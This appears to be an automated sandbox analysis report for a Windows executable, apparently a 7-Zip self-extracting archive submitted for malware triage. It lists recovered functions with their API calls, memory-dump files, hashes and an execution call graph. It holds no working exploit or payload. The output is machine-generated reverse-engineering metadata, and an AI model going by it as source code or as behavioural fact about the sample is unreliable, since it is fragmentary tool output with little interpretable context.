                                                                                • Opcode Fuzzy Hash: 59522b9d663a006d42a11aac5f69606e4972673f07fc2ef7bcdb3eae39c19829
                                                                                • Instruction Fuzzy Hash: 37F0A4B22002097FD7249F29C886D9AF7EDEF44358B15853FF55A87111D635E9808768
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(-00000010,00000000,?,?,?,00416AB5,00000003,?,00000000,00000000,00416B12,00000000), ref: 00413EF4
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00416AB5,00000003,?,00000000,00000000,00416B12,00000000), ref: 00413F03
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00416AB5,00000003,?,00000000,00000000,00416B12,00000000), ref: 00413F12
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00416AB5,00000003,?,00000000,00000000,00416B12,00000000), ref: 00413F1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 6ecebc8fe35b15f2f4658fd50fc4d58a1ee2178658a9431f9aca16722c220241
                                                                                • Instruction ID: df1d0de5d1faf2a4a63eb667afbff75c77527abce675b50cc2a020710efc852e
                                                                                • Opcode Fuzzy Hash: 6ecebc8fe35b15f2f4658fd50fc4d58a1ee2178658a9431f9aca16722c220241
                                                                                • Instruction Fuzzy Hash: 7CF084323042022AD2111F0DDC0A7CABBFA9F41362F08001FFA41A2362CA1ADEC2C18C
                                                                                APIs
                                                                                  • Part of subcall function 00404BDD: GetWindowTextLengthW.USER32(?), ref: 00404BEA
                                                                                  • Part of subcall function 00404BDD: GetWindowTextW.USER32(?,00000000,00000001), ref: 00404C04
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0041AD70,0041AD78,0041E7F0,?,?,?,?,?,?,?,?,00407A26), ref: 00404C63
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041AD70,0041AD78,0041E7F0,?,?,?,?,?,?,?,?,00407A26), ref: 00404C6B
                                                                                • SetWindowTextW.USER32(?,?), ref: 00404C76
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00407A26), ref: 00404C81
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@TextWindow$Lengthmemcpy
                                                                                • String ID:
                                                                                • API String ID: 396479319-0
                                                                                • Opcode ID: 0445f756f2a7ca887c11b9469608701bcee61c3d7040cf18a8db65bd5d881795
                                                                                • Instruction ID: 647b8b2bf9eadde8599631ea9265a657a51aafb4ceea6ad50fefe68966c78ca3
                                                                                • Opcode Fuzzy Hash: 0445f756f2a7ca887c11b9469608701bcee61c3d7040cf18a8db65bd5d881795
                                                                                • Instruction Fuzzy Hash: 63F04432D044096ACB05F7D1EC578DDB779DE08318B1001ABF602B21A1EF796ED5C69C
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,00920F20,00000000,?,00411709,?,00411862,00000000,?,00920F20,0041AD18,0040412A,0041AD18,?,-00000001), ref: 00411620
                                                                                • memcpy.MSVCRT(00000000,00920F20,?,?,?,00920F20,00000000,?,00411709,?,00411862,00000000,?,00920F20,0041AD18,0040412A), ref: 0041162F
                                                                                • ??3@YAXPAX@Z.MSVCRT(00920F20,00000000,00920F20,?,?,?,00920F20,00000000,?,00411709,?,00411862,00000000,?,00920F20,0041AD18), ref: 00411636
                                                                                • _CxxThrowException.MSVCRT(00920F20,0041C9D4), ref: 0041165A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                • String ID:
                                                                                • API String ID: 3462485524-0
                                                                                • Opcode ID: b7077fc6d72f980726724f3404c27e9269fca811e94df1e07385922be1dcacac
                                                                                • Instruction ID: acb851cd5d6ec94b4642c442a788d7ea64d5cf8d2888cb5aee67fa9e3068b209
                                                                                • Opcode Fuzzy Hash: b7077fc6d72f980726724f3404c27e9269fca811e94df1e07385922be1dcacac
                                                                                • Instruction Fuzzy Hash: D4F0B4B2100209BFD720AF5ACC81DDAF7EEFF54358714442FF99A83511D235A8C08BA8
                                                                                APIs
                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 004082A2
                                                                                • CreateFontIndirectW.GDI32(?), ref: 004082B8
                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004082CC
                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 004082D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                • String ID:
                                                                                • API String ID: 2001801573-0
                                                                                • Opcode ID: 5b90f754ead787c82706a5892f36a112a510cb736c9de123742b44b620c41e27
                                                                                • Instruction ID: a857720c60cc7c4988bb0c271694e7fb1085ae67bc77bdb5017f4508090161c8
                                                                                • Opcode Fuzzy Hash: 5b90f754ead787c82706a5892f36a112a510cb736c9de123742b44b620c41e27
                                                                                • Instruction Fuzzy Hash: BAF0BE75501708ABD7205BA4DE09FCB7FACAB48B00F048039AE42E21D4DBB4D8108B29
                                                                                APIs
                                                                                • GetParent.USER32 ref: 004039C4
                                                                                • GetWindowRect.USER32(?,?), ref: 004039D2
                                                                                • ScreenToClient.USER32(00000000,?), ref: 004039E0
                                                                                • ScreenToClient.USER32(00000000,?), ref: 004039E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ClientScreen$ParentRectWindow
                                                                                • String ID:
                                                                                • API String ID: 2099118873-0
                                                                                • Opcode ID: 2d4f567ce59a15c9bff0a5a7b1bdb7657322f25b8406bf3dc624692a176b5e82
                                                                                • Instruction ID: 05e44d1457520c43b4422ecb6510286d39cbf22b8ad041ba1dad1a8fa24c712d
                                                                                • Opcode Fuzzy Hash: 2d4f567ce59a15c9bff0a5a7b1bdb7657322f25b8406bf3dc624692a176b5e82
                                                                                • Instruction Fuzzy Hash: 06E0C2732022206B931127B66C88CEB5E5CCDC25723060036F909D2311C9B5CC0185B0
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,PreExtract,0041AA3C,00000000,?,00000000,PreExtract,0041E89C,00000000), ref: 00405B55
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@
                                                                                • String ID: PreExtract$Shortcut
                                                                                • API String ID: 1936579350-2482910946
                                                                                • Opcode ID: fadad1ec2e81b89812f4e292f7c130b7338f4d0e1c19578ce685f96c8dd63308
                                                                                • Instruction ID: 315cf4f10766d584262b92d033bb85e5ff693b0b03308dd198ea8ef753a083d6
                                                                                • Opcode Fuzzy Hash: fadad1ec2e81b89812f4e292f7c130b7338f4d0e1c19578ce685f96c8dd63308
                                                                                • Instruction Fuzzy Hash: 6B21A634A005099ADF24EB55C5856FFB374DF51324F24423BE861BA2C1EA7CAE81CF69
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: _wtol
                                                                                • String ID: MiscFlags$tA
                                                                                • API String ID: 2131799477-2718850419
                                                                                • Opcode ID: 2afad0e8fec61067b3716dfa9b106afa26c29772baddf64e22fdb0a12229e978
                                                                                • Instruction ID: c8600267b0de4b6b736e5ffddf797ee874a7f0c572f21ec5a04ec4b3cd89c438
                                                                                • Opcode Fuzzy Hash: 2afad0e8fec61067b3716dfa9b106afa26c29772baddf64e22fdb0a12229e978
                                                                                • Instruction Fuzzy Hash: 30F0306180082042DB38161554C857BA696DA1B761FB94E3BE85EF12E0D33F8CC19D6F
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00405B85
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: 7-Zip SFX$Could not allocate memory
                                                                                • API String ID: 2030045667-3806377612
                                                                                • Opcode ID: c7186cdcb0c566b5a5a438bceff3b0e8cdd749d374d7577f2b3fc30ec3787668
                                                                                • Instruction ID: 2fd3f133cd00b8be6539cc3c82b36fa91af98800b418d3be2fc451a6c5964550
                                                                                • Opcode Fuzzy Hash: c7186cdcb0c566b5a5a438bceff3b0e8cdd749d374d7577f2b3fc30ec3787668
                                                                                • Instruction Fuzzy Hash: BEB012303C930821D10003200C0BFD41160D70CF16F5044517100A8CC9C7C87090914D

                                                                                Execution Graph

                                                                                Execution Coverage:2.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:3.5%
                                                                                Total number of Nodes:1947
                                                                                Total number of Limit Nodes:50
                                                                                execution_graph 106488 c38960 106497 c394c5 106488->106497 106490 c38971 106491 c3899b 106490->106491 106505 c38deb 106490->106505 106493 c38c8d 22 API calls 106491->106493 106496 c3875e 106493->106496 106515 c38e3b 106497->106515 106499 c394d4 106500 c76af3 106499->106500 106503 c3afe0 22 API calls 106499->106503 106504 c39522 106499->106504 106519 c99eb9 84 API calls __wsopen_s 106500->106519 106502 c76b01 106503->106499 106504->106490 106506 c38dfb 106505->106506 106507 c501fb 22 API calls 106506->106507 106508 c3898f 106507->106508 106509 c38c8d 106508->106509 106512 c38c9d __fread_nolock 106509->106512 106510 c501fb 22 API calls 106511 c38ca4 106510->106511 106513 c501fb 22 API calls 106511->106513 106514 c38cc2 106511->106514 106512->106510 106513->106514 106514->106491 106516 c38e55 106515->106516 106518 c38e48 106515->106518 106520 c501fb 106516->106520 106518->106499 106519->106502 106522 c50200 106520->106522 106523 c5021a 106522->106523 106526 c5021c 106522->106526 106530 c5ee2c 106522->106530 106537 c552cd 7 API calls 2 library calls 106522->106537 106523->106518 106525 c50a8d 106539 c536c4 RaiseException 106525->106539 106526->106525 106538 c536c4 RaiseException 106526->106538 106528 c50aaa 106528->106518 106535 c63c40 _abort 106530->106535 106531 c63c7e 106541 c62c38 20 API calls _abort 106531->106541 106532 c63c69 RtlAllocateHeap 106534 c63c7c 106532->106534 106532->106535 106534->106522 106535->106531 106535->106532 106540 c552cd 7 API calls 2 library calls 106535->106540 106537->106522 106538->106525 106539->106528 106540->106535 106541->106534 106542 c68822 106547 c685de 106542->106547 106545 c6884a 106552 c6860f try_get_first_available_module 106547->106552 106549 c6880e 106571 c62b7c 26 API calls _abort 106549->106571 106551 c68763 106551->106545 106559 c70da5 106551->106559 106558 c68758 106552->106558 106562 c5922b 106552->106562 106555 c5922b 40 API calls 106556 c687cb 106555->106556 106557 c5922b 40 API calls 106556->106557 106556->106558 106557->106558 106558->106551 106570 c62c38 20 API calls _abort 106558->106570 106575 c704a2 106559->106575 106561 c70dc0 106561->106545 106563 c5923f 106562->106563 106564 c592cb 106562->106564 106569 c59261 106563->106569 106572 c62c38 20 API calls _abort 106563->106572 106574 c592e3 40 API calls 4 library calls 106564->106574 106567 c59256 106573 c62b7c 26 API calls _abort 106567->106573 106569->106555 106569->106558 106570->106549 106571->106551 106572->106567 106573->106569 106574->106569 106578 c704ae ___BuildCatchObject 106575->106578 106576 c704bc 106632 c62c38 20 API calls _abort 106576->106632 106578->106576 106580 c704f5 106578->106580 106579 c704c1 106633 c62b7c 26 API calls _abort 106579->106633 106586 c70a7c 106580->106586 106585 c704cb __fread_nolock 106585->106561 106587 c70a99 106586->106587 106588 c70ac7 106587->106588 106589 c70aae 106587->106589 106635 c65641 106588->106635 106649 c62c25 20 API calls _abort 106589->106649 106592 c70ab3 106650 c62c38 20 API calls _abort 106592->106650 106593 c70acc 106594 c70ad5 106593->106594 106595 c70aec 106593->106595 106651 c62c25 20 API calls _abort 106594->106651 106648 c707bb CreateFileW 106595->106648 106599 c70ada 106652 c62c38 20 API calls _abort 106599->106652 106600 c70ba2 GetFileType 106603 c70bf4 106600->106603 106604 c70bad GetLastError 106600->106604 106602 c70b77 GetLastError 106654 c62c02 20 API calls __dosmaperr 106602->106654 106657 c6558a 21 API calls 2 library calls 106603->106657 106655 c62c02 20 API calls __dosmaperr 106604->106655 106605 c70b25 106605->106600 106605->106602 106653 c707bb CreateFileW 106605->106653 106609 c70bbb CloseHandle 106609->106592 106612 c70be4 106609->106612 106611 c70b6a 106611->106600 106611->106602 106656 c62c38 20 API calls _abort 106612->106656 106613 c70c15 106615 c70c61 106613->106615 106658 c709cc 72 API calls 3 library calls 106613->106658 106620 c70c8e 106615->106620 106659 c7056e 72 API calls 4 library calls 106615->106659 106616 c70be9 106616->106592 106619 c70c87 106619->106620 106623 c70c9f 106619->106623 106660 c68ace 106620->106660 106622 c70519 106634 c70542 LeaveCriticalSection __wsopen_s 106622->106634 106623->106622 106624 c70d1d CloseHandle 106623->106624 106675 c707bb CreateFileW 106624->106675 106626 c70d48 106627 c70d7e 106626->106627 106628 c70d52 GetLastError 106626->106628 106627->106622 106676 c62c02 20 API calls __dosmaperr 106628->106676 106630 c70d5e 106677 c65753 21 API calls 2 library calls 106630->106677 106632->106579 106633->106585 106634->106585 106636 c6564d ___BuildCatchObject 106635->106636 106678 c6337e EnterCriticalSection 106636->106678 106638 c6569b 106679 c6574a 106638->106679 106640 c65654 106640->106638 106641 c65679 106640->106641 106645 c656e7 EnterCriticalSection 106640->106645 106682 c65420 21 API calls 3 library calls 106641->106682 106642 c656c4 __fread_nolock 106642->106593 106644 c6567e 106644->106638 106683 c65567 EnterCriticalSection 106644->106683 106645->106638 106647 c656f4 LeaveCriticalSection 106645->106647 106647->106640 106648->106605 106649->106592 106650->106622 106651->106599 106652->106592 106653->106611 106654->106592 106655->106609 106656->106616 106657->106613 106658->106615 106659->106619 106685 c657e4 106660->106685 106662 c68ae4 106698 c65753 21 API calls 2 library calls 106662->106698 106664 c68ade 106664->106662 106666 c657e4 __wsopen_s 26 API calls 106664->106666 106674 c68b16 106664->106674 106665 c68b3c 106672 c68b5e 106665->106672 106699 c62c02 20 API calls __dosmaperr 106665->106699 106668 c68b0d 106666->106668 106667 c657e4 __wsopen_s 26 API calls 106669 c68b22 CloseHandle 106667->106669 106673 c657e4 __wsopen_s 26 API calls 106668->106673 106669->106662 106670 c68b2e GetLastError 106669->106670 106670->106662 106672->106622 106673->106674 106674->106662 106674->106667 106675->106626 106676->106630 106677->106627 106678->106640 106684 c633c6 LeaveCriticalSection 106679->106684 106681 c65751 106681->106642 106682->106644 106683->106638 106684->106681 106686 c65806 106685->106686 106687 c657f1 106685->106687 106692 c6582b 106686->106692 106702 c62c25 20 API calls _abort 106686->106702 106700 c62c25 20 API calls _abort 106687->106700 106690 c657f6 106701 c62c38 20 API calls _abort 106690->106701 106692->106664 106693 c65836 106703 c62c38 20 API calls _abort 106693->106703 106694 c657fe 106694->106664 106696 c6583e 106704 c62b7c 26 API calls _abort 106696->106704 106698->106665 106699->106672 106700->106690 106701->106694 106702->106693 106703->106696 106704->106694 106705 c72822 106708 c363ce 106705->106708 106709 c74dc6 DestroyWindow 106708->106709 106710 c3640d mciSendStringW 106708->106710 106722 c74dd2 106709->106722 106711 c36684 106710->106711 106712 c36429 106710->106712 106711->106712 106714 c36693 UnregisterHotKey 106711->106714 106713 c36437 106712->106713 106712->106722 106741 c351e0 106713->106741 106714->106711 106716 c74e17 106721 c74e2a FreeLibrary 106716->106721 106723 c74e3b 106716->106723 106717 c74df0 FindClose 106717->106722 106720 c3644c 106720->106723 106727 c3645a 106720->106727 106721->106716 106722->106716 106722->106717 106746 c362ad 106722->106746 106724 c74e4f VirtualFree 106723->106724 106729 c364c7 106723->106729 106724->106723 106725 c364b6 CoUninitialize 106725->106729 106726 c74e97 106734 c74ea6 ISource 106726->106734 106750 ca3c02 6 API calls ISource 106726->106750 106727->106725 106729->106726 106730 c364d2 106729->106730 106745 c361ba 22 API calls 106730->106745 106737 c74f35 106734->106737 106751 c96cf0 22 API calls ISource 106734->106751 106737->106737 106742 c351ed 106741->106742 106743 c35212 106742->106743 106752 c97846 22 API calls 106742->106752 106743->106716 106743->106720 106747 c362b7 106746->106747 106748 c362c6 106746->106748 106747->106722 106748->106747 106749 c362cb CloseHandle 106748->106749 106749->106747 106750->106726 106751->106734 106752->106742 106753 c33be6 106756 c33c00 106753->106756 106757 c33c17 106756->106757 106758 c33c79 106757->106758 106759 c33c7b 106757->106759 106760 c33c1c 106757->106760 106761 c33c60 DefWindowProcW 106758->106761 106762 c33c81 106759->106762 106763 c73fae 106759->106763 106764 c33cf5 PostQuitMessage 106760->106764 106765 c33c29 106760->106765 106769 c33bfa 106761->106769 106770 c33c88 106762->106770 106771 c33cad SetTimer RegisterWindowMessageW 106762->106771 106806 c4f18d 10 API calls 106763->106806 106764->106769 106766 c33c34 106765->106766 106767 c7401b 106765->106767 106772 c33cff 106766->106772 106773 c33c3e 106766->106773 106811 c9c7a2 66 API calls ___scrt_fastfail 106767->106811 106777 c33c91 KillTimer 106770->106777 106778 c73f4f 106770->106778 106771->106769 106774 c33cd6 CreatePopupMenu 106771->106774 106804 c4fd8b 59 API calls ___scrt_fastfail 106772->106804 106779 c74000 106773->106779 106780 c33c49 106773->106780 106774->106769 106776 c73fcf 106807 c4f060 41 API calls 106776->106807 106801 c33b82 Shell_NotifyIconW ___scrt_fastfail 106777->106801 106784 c73f54 106778->106784 106785 c73f8a MoveWindow 106778->106785 106779->106761 106810 c91351 22 API calls 106779->106810 106787 c33ce3 106780->106787 106788 c33c54 106780->106788 106781 c7402d 106781->106761 106781->106769 106790 c73f5a 106784->106790 106791 c73f79 SetFocus 106784->106791 106785->106769 106803 c33d10 76 API calls ___scrt_fastfail 106787->106803 106788->106761 106808 c33b82 Shell_NotifyIconW ___scrt_fastfail 106788->106808 106789 c33cf3 106789->106769 106790->106788 106794 c73f63 106790->106794 106791->106769 106792 c33ca4 106802 c353ce DeleteObject DestroyWindow 106792->106802 106805 c4f18d 10 API calls 106794->106805 106799 c73ff4 106809 c33df8 61 API calls ___scrt_fastfail 106799->106809 106801->106792 106802->106769 106803->106789 106804->106789 106805->106769 106806->106776 106807->106788 106808->106799 106809->106758 106810->106758 106811->106781 106812 c31044 106817 c338e2 106812->106817 106814 c3104a 106853 c504c3 29 API calls __onexit 106814->106853 106816 c31054 106854 c33688 106817->106854 106821 c33959 106864 c39091 106821->106864 106824 c39091 22 API calls 106825 c3396d 106824->106825 106826 c39091 22 API calls 106825->106826 106827 c33977 106826->106827 106828 c39091 22 API calls 106827->106828 106829 c339b5 106828->106829 106830 c39091 22 API calls 106829->106830 106831 c33a81 106830->106831 106868 c35c93 106831->106868 106835 c33ab3 106836 c39091 22 API calls 106835->106836 106837 c33abd 106836->106837 106895 c43de0 106837->106895 106839 c33ae8 106905 c33806 106839->106905 106841 c33b04 106842 c33b14 GetStdHandle 106841->106842 106843 c33b64 106842->106843 106844 c73f1c 106842->106844 106847 c33b71 OleInitialize 106843->106847 106844->106843 106845 c73f25 106844->106845 106846 c501fb 22 API calls 106845->106846 106848 c73f2c 106846->106848 106847->106814 106910 ca0984 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 106848->106910 106850 c73f35 106911 ca1188 CreateThread 106850->106911 106852 c73f41 CloseHandle 106852->106843 106853->106816 106912 c336e1 106854->106912 106857 c336e1 22 API calls 106858 c336c0 106857->106858 106859 c39091 22 API calls 106858->106859 106860 c336cc 106859->106860 106919 c3b0db 106860->106919 106862 c336d8 106863 c33700 6 API calls 106862->106863 106863->106821 106865 c390a6 106864->106865 106866 c501fb 22 API calls 106865->106866 106867 c33963 106866->106867 